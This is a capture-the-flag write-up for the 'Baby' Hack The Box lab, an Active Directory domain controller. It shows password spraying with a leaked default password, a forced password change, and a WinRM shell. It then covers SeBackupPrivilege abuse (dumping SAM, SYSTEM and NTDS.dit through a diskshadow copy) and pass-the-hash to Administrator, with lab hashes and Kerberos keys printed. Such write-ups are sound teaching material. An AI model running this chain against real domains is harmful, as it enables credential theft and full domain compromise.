Nmap
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ nmap -sC -sV -Pn 10.129.242.229 -oN ./nmap.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-22 16:14 UTC
Nmap scan report for 10.129.242.229
Host is up (0.33s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-22 06:47:14Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 142.93 seconds
The domain is baby.vl0, let's add it to our /etc/hosts
Continue by creating a hosts file entry using netexec
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ netexec smb 10.129.242.229 --generate-hosts-file hosts
SMB 10.129.242.229 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
Also add to our /etc/hosts
SMB
Firstly, let's enumerate the SMB service.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ netexec smb 10.129.242.229 -u guest -p '' --shares
SMB 10.129.242.229 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.129.242.229 445 BABYDC [-] baby.vl\guest: STATUS_ACCOUNT_DISABLED
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ netexec smb 10.129.242.229 -u wither -p '' --shares
SMB 10.129.242.229 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.129.242.229 445 BABYDC [-] baby.vl\wither: STATUS_LOGON_FAILURE
We can not use guest account to check the service, we still don't have any other valid credit here.
LDAP
Continue to enumerate the LDAP service, firstly check all the objects
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ netexec ldap BABYDC.baby.vl -u '' -p '' --query "(objectClass=*)" "" | grep "Response for object:"
LDAP 10.129.242.229 389 BABYDC [+] Response for object: DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Administrator,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Guest,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=krbtgt,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Domain Computers,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Schema Admins,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Enterprise Admins,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Domain Admins,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Domain Users,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Domain Guests,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Protected Users,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Key Admins,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Enterprise Key Admins,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=DnsAdmins,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=dev,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Hugh George,OU=dev,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Ian Walker,OU=dev,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=it,CN=Users,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Teresa Bell,OU=it,DC=baby,DC=vl
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
Then do the full dump to these objects
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ netexec ldap BABYDC.baby.vl -u '' -p '' --query "(sAMAccountName=*)" ""
LDAP 10.129.242.229 389 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
LDAP 10.129.242.229 389 BABYDC [+] baby.vl\:
LDAP 10.129.242.229 389 BABYDC [+] Response for object: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby,DC=vl
------
From these information, we can find something interesting about a initial credit
LDAP 10.129.242.229 389 BABYDC description Set initial password to BabyStart123!
I will create a user list from LDAP data and attempt password spraying
Ashley.Webb
Connor.Wilkinson
dev
Guest
Hugh.George
Jacqueline.Barnett
Joseph.Hughes
Kerry.Wilson
Leonard.Dyer
Teresa.Bell
Caroline.Robinson
Then run the command
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ netexec smb BABYDC.baby.vl -u users -p 'BabyStart123!' --continue-on-success
SMB 10.129.242.229 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.129.242.229 445 BABYDC [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.242.229 445 BABYDC [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.242.229 445 BABYDC [-] baby.vl\dev:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.242.229 445 BABYDC [-] baby.vl\Guest:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.242.229 445 BABYDC [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.242.229 445 BABYDC [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.242.229 445 BABYDC [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.242.229 445 BABYDC [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.242.229 445 BABYDC [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.242.229 445 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.242.229 445 BABYDC [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
There is something wired here
Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
That means we need to change the password of this account.
I would like use Impacket's changepasswd.py
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ changepasswd.py 'Caroline.Robinson:BabyStart123!@BABYDC.baby.vl' -newpass 'wither123'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of Builtin\Caroline.Robinson
[*] Connecting to DCE/RPC as Builtin\Caroline.Robinson
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[-] Some password update rule has been violated. For example, the password his
But this password is too easy and can't pass the password policy.
Let's try to use more complex
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ changepasswd.py 'Caroline.Robinson:BabyStart123!@BABYDC.baby.vl' -newpass 'wither123...'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of Builtin\Caroline.Robinson
[*] Connecting to DCE/RPC as Builtin\Caroline.Robinson
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.
Now we can check the password policy here
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ netexec smb BABYDC.baby.vl -u Caroline.Robinson -p wither123... --pass-pol
SMB 10.129.242.229 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.129.242.229 445 BABYDC [+] baby.vl\Caroline.Robinson:wither123...
SMB 10.129.242.229 445 BABYDC [+] Dumping password info for domain: BABY
SMB 10.129.242.229 445 BABYDC Minimum password length: 7
SMB 10.129.242.229 445 BABYDC Password history length: 24
SMB 10.129.242.229 445 BABYDC Maximum password age: 41 days 23 hours 53 minutes
SMB 10.129.242.229 445 BABYDC
SMB 10.129.242.229 445 BABYDC Password Complexity Flags: 000001
SMB 10.129.242.229 445 BABYDC Domain Refuse Password Change: 0
SMB 10.129.242.229 445 BABYDC Domain Password Store Cleartext: 0
SMB 10.129.242.229 445 BABYDC Domain Password Lockout Admins: 0
SMB 10.129.242.229 445 BABYDC Domain Password No Clear Change: 0
SMB 10.129.242.229 445 BABYDC Domain Password No Anon Change: 0
SMB 10.129.242.229 445 BABYDC Domain Password Complex: 1
SMB 10.129.242.229 445 BABYDC
SMB 10.129.242.229 445 BABYDC Minimum password age: 1 day 4 minutes
SMB 10.129.242.229 445 BABYDC Reset Account Lockout Counter: 30 minutes
SMB 10.129.242.229 445 BABYDC Locked Account Duration: 30 minutes
SMB 10.129.242.229 445 BABYDC Account Lockout Threshold: None
SMB 10.129.242.229 445 BABYDC Forced Log off Time: Not Set
This means there must be at least three of uppercase, lowercase, numbers, and special characters
We have change the password successfully, let's check the validity
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ nxc winrm BABYDC.baby.vl -u Caroline.Robinson -p wither123...
WINRM 10.129.242.229 5985 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
WINRM 10.129.242.229 5985 BABYDC [+] baby.vl\Caroline.Robinson:wither123... (Pwn3d!)
Let's use evil-winrmto help us get the shell
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ evil-winrm -i 10.129.242.229 -u Caroline.Robinson -p wither123...
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> whoami
baby\caroline.robinson
Privilege escalation
Firstly, I would check the group of this account
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BABY\it Group S-1-5-21-1407081343-4001094062-1444647654-1109 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Backup Operatorswould be our target here.
Joining this group grants SeBackupPrivilege and SeRestorePrivielge:
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
In this place, I would show you the typical way to exploit
Firstly, dump registry hives to files and exfil them
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> reg save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> reg save hklm\system system
The operation completed successfully.
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> download sam
Info: Downloading C:\Users\Caroline.Robinson\Desktop\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> download system
Then I’ll use secretsdump.py from Impacket:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ secretsdump.py -sam sam -system system LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
But this hash can not worked here.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ netexec smb BABYDC.baby.vl -u Administrator -H 8d992faed38128ae85e95fa35868bb43
SMB 10.129.242.229 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.129.242.229 445 BABYDC [-] baby.vl\Administrator:8d992faed38128ae85e95fa35868bb43 STATUS_LOGON_FAILURE
To dump the domain hashes, I need to get the C:\Windows\NTDS.dit file. Unfortunately, I can't copy it directly because it's locked and in use. I can access it through a shadow copy, which I'll generate using diskshadow and the following script:
set verbose on
set context persistent nowriters
set metadata C:\Windows\Temp\wither.cab
add volume c: alias wither
create
expose %wither% e:
Save this and convert it to Windows newlines
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ unix2dos backup
unix2dos: converting file backup to DOS format...
Upload it to Baby and pass it to diskshadow
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> cd C:\Programdata
*Evil-WinRM* PS C:\Programdata> upload backup
Info: Uploading /home/wither/Templates/htb-labs/Easy/Baby/backup to C:\Programdata\backup
Data: 196 bytes of 196 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Programdata> diskshadow /s C:\programdata\backup
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: BABYDC, 9/22/2025 7:39:11 AM
-> set verbose on
-> set context persistent nowriters
-> set metadata C:\Windows\Temp\wither.cab
-> add volume c: alias wither
-> create
Alias wither for shadow ID {9c9ec608-53da-4872-8c17-d70e3b194320} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {b3075aa4-b464-47fc-b23c-e07e6c24f4ad} set as environment variable.
Inserted file Manifest.xml into .cab file wither.cab
Inserted file Dis2B5.tmp into .cab file wither.cab
Querying all shadow copies with the shadow copy set ID {b3075aa4-b464-47fc-b23c-e07e6c24f4ad}
* Shadow copy ID = {9c9ec608-53da-4872-8c17-d70e3b194320} %wither%
- Shadow copy set: {b3075aa4-b464-47fc-b23c-e07e6c24f4ad} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{711fc68a-0000-0000-0000-100000000000}\ [C:\]
- Creation time: 9/22/2025 7:39:11 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: BabyDC.baby.vl
- Service machine: BabyDC.baby.vl
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %wither% e:
-> %wither% = {9c9ec608-53da-4872-8c17-d70e3b194320}
The shadow copy was successfully exposed as e:\.
->
Now there’s a copy of the C: drive at E::
*Evil-WinRM* PS C:\Programdata> ls E:\
Directory: E:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 8/19/2021 6:24 AM EFI
d----- 4/16/2025 9:17 AM inetpub
d----- 5/8/2021 8:20 AM PerfLogs
d-r--- 4/16/2025 8:35 AM Program Files
d----- 4/16/2025 9:38 AM Program Files (x86)
d-r--- 7/27/2024 10:27 PM Users
d----- 8/20/2025 9:07 AM Windows
We can use robocopy to get the NTDS.dit file out:
*Evil-WinRM* PS C:\Programdata> robocopy /b E:\Windows\ntds . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Monday, September 22, 2025 7:40:45 AM
Source : E:\Windows\ntds\
Dest : C:\Programdata\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 E:\Windows\ntds\
New File 16.0 m ntds.dit
We can download ntds.ditand dump hashes from this using secretsdump.py
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ secretsdump.py -ntds ntds.dit -system system LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BABYDC$:1000:aad3b435b51404eeaad3b435b51404ee:3d538eabff6633b62dbaa5fb5ade3b4d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6da4842e8c24b99ad21a92d620893884:::
baby.vl\Jacqueline.Barnett:1104:aad3b435b51404eeaad3b435b51404ee:20b8853f7aa61297bfbc5ed2ab34aed8:::
baby.vl\Ashley.Webb:1105:aad3b435b51404eeaad3b435b51404ee:02e8841e1a2c6c0fa1f0becac4161f89:::
baby.vl\Hugh.George:1106:aad3b435b51404eeaad3b435b51404ee:f0082574cc663783afdbc8f35b6da3a1:::
baby.vl\Leonard.Dyer:1107:aad3b435b51404eeaad3b435b51404ee:b3b2f9c6640566d13bf25ac448f560d2:::
baby.vl\Ian.Walker:1108:aad3b435b51404eeaad3b435b51404ee:0e440fd30bebc2c524eaaed6b17bcd5c:::
baby.vl\Connor.Wilkinson:1110:aad3b435b51404eeaad3b435b51404ee:e125345993f6258861fb184f1a8522c9:::
baby.vl\Joseph.Hughes:1112:aad3b435b51404eeaad3b435b51404ee:31f12d52063773769e2ea5723e78f17f:::
baby.vl\Kerry.Wilson:1113:aad3b435b51404eeaad3b435b51404ee:181154d0dbea8cc061731803e601d1e4:::
baby.vl\Teresa.Bell:1114:aad3b435b51404eeaad3b435b51404ee:7735283d187b758f45c0565e22dc20d8:::
baby.vl\Caroline.Robinson:1115:aad3b435b51404eeaad3b435b51404ee:5fa67a134024d41bb4ff8bfd7da5e2b5:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:ad08cbabedff5acb70049bef721524a23375708cadefcb788704ba00926944f4
Administrator:aes128-cts-hmac-sha1-96:ac7aa518b36d5ea26de83c8d6aa6714d
Administrator:des-cbc-md5:d38cb994ae806b97
BABYDC$:aes256-cts-hmac-sha1-96:1a7d22edfaf3a8083f96a0270da971b4a42822181db117cf98c68c8f76bcf192
BABYDC$:aes128-cts-hmac-sha1-96:406b057cd3a92a9cc719f23b0821a45b
BABYDC$:des-cbc-md5:8fef68979223d645
krbtgt:aes256-cts-hmac-sha1-96:9c578fe1635da9e96eb60ad29e4e4ad90fdd471ea4dff40c0c4fce290a313d97
krbtgt:aes128-cts-hmac-sha1-96:1541c9f79887b4305064ddae9ba09e14
krbtgt:des-cbc-md5:d57383f1b3130de5
baby.vl\Jacqueline.Barnett:aes256-cts-hmac-sha1-96:851185add791f50bcdc027e0a0385eadaa68ac1ca127180a7183432f8260e084
baby.vl\Jacqueline.Barnett:aes128-cts-hmac-sha1-96:3abb8a49cf283f5b443acb239fd6f032
baby.vl\Jacqueline.Barnett:des-cbc-md5:01df1349548a206b
baby.vl\Ashley.Webb:aes256-cts-hmac-sha1-96:fc119502b9384a8aa6aff3ad659aa63bab9ebb37b87564303035357d10fa1039
baby.vl\Ashley.Webb:aes128-cts-hmac-sha1-96:81f5f99fd72fadd005a218b96bf17528
baby.vl\Ashley.Webb:des-cbc-md5:9267976186c1320e
baby.vl\Hugh.George:aes256-cts-hmac-sha1-96:0ea359386edf3512d71d3a3a2797a75db3168d8002a6929fd242eb7503f54258
baby.vl\Hugh.George:aes128-cts-hmac-sha1-96:50b966bdf7c919bfe8e85324424833dc
baby.vl\Hugh.George:des-cbc-md5:296bec86fd323b3e
baby.vl\Leonard.Dyer:aes256-cts-hmac-sha1-96:6d8fd945f9514fe7a8bbb11da8129a6e031fb504aa82ba1e053b6f51b70fdddd
baby.vl\Leonard.Dyer:aes128-cts-hmac-sha1-96:35fd9954c003efb73ded2fde9fc00d5a
baby.vl\Leonard.Dyer:des-cbc-md5:022313dce9a252c7
baby.vl\Ian.Walker:aes256-cts-hmac-sha1-96:54affe14ed4e79d9c2ba61713ef437c458f1f517794663543097ff1c2ae8a784
baby.vl\Ian.Walker:aes128-cts-hmac-sha1-96:78dbf35d77f29de5b7505ee88aef23df
baby.vl\Ian.Walker:des-cbc-md5:bcb094c2012f914c
baby.vl\Connor.Wilkinson:aes256-cts-hmac-sha1-96:55b0af76098dfe3731550e04baf1f7cb5b6da00de24c3f0908f4b2a2ea44475e
baby.vl\Connor.Wilkinson:aes128-cts-hmac-sha1-96:9d4af8203b2f9e3ecf64c1cbbcf8616b
baby.vl\Connor.Wilkinson:des-cbc-md5:fda762e362ab7ad3
baby.vl\Joseph.Hughes:aes256-cts-hmac-sha1-96:2e5f25b14f3439bfc901d37f6c9e4dba4b5aca8b7d944957651655477d440d41
baby.vl\Joseph.Hughes:aes128-cts-hmac-sha1-96:39fa92e8012f1b3f7be63c7ca9fd6723
baby.vl\Joseph.Hughes:des-cbc-md5:02f1cd9e52e0f245
baby.vl\Kerry.Wilson:aes256-cts-hmac-sha1-96:db5f7da80e369ee269cd5b0dbaea74bf7f7c4dfb3673039e9e119bd5518ea0fb
baby.vl\Kerry.Wilson:aes128-cts-hmac-sha1-96:aebbe6f21c76460feeebea188affbe01
baby.vl\Kerry.Wilson:des-cbc-md5:1f191c8c49ce07fe
baby.vl\Teresa.Bell:aes256-cts-hmac-sha1-96:8bb9cf1637d547b31993d9b0391aa9f771633c8f2ed8dd7a71f2ee5b5c58fc84
baby.vl\Teresa.Bell:aes128-cts-hmac-sha1-96:99bf021e937e1291cc0b6e4d01d96c66
baby.vl\Teresa.Bell:des-cbc-md5:4cbcdc3de6b50ee9
baby.vl\Caroline.Robinson:aes256-cts-hmac-sha1-96:6fe5d46e01d6cf9909f479fb4d7afac0bd973981dd958e730a734aa82c9e13af
baby.vl\Caroline.Robinson:aes128-cts-hmac-sha1-96:f34e6c0c8686a46eea8fd15a361601f9
baby.vl\Caroline.Robinson:des-cbc-md5:fd40190d579138df
[*] Cleaning up...
Then let's validate this hash again
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ netexec smb BABYDC.baby.vl -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d
SMB 10.129.242.229 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.129.242.229 445 BABYDC [+] baby.vl\Administrator:ee4457ae59f1e3fbd764e33d9cef123d (Pwn3d!)
We can use this hash to get the administrator shell
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ evil-winrm -i BABYDC.baby.vl -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Description
A very basic AD domain machine, the use of Exploit SeBackupPrivilege for privilege escalation is also very common.